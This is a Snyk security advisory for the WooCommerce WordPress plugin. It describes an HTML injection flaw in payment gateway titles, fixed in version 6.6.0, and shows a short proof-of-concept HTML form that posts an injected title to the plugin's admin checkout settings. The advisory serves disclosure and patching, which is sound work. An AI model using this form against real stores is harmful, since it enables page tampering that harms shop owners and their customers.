Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade woocommerce/woocommerce
to version 6.6.0 or higher.
woocommerce/woocommerce is an eCommerce toolkit that helps you sell anything.
Affected versions of this package are vulnerable to HTML Injection due to lack of escaping and sanitizing in the payment gateway titles.
<html>
<form action="http://example.com/wp-admin/admin.php?page=wc-settings&tab=checkout§ion=bacs" method="POST">
<input class="input-text regular-input " type="text" name="woocommerce_bacs_title" id="woocommerce_bacs_title" style="" value="HTML INJECTION" placeholder="">
<p class="submit">
<button name="save" class="button-primary woocommerce-save-button" type="submit" value="Save changes">Save changes</button>
<input type="hidden" id="_wpnonce" name="_wpnonce" value="bfdcc984ec"><input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=wc-settings&tab=checkout&section=bacs"> </p>
</form>
</html>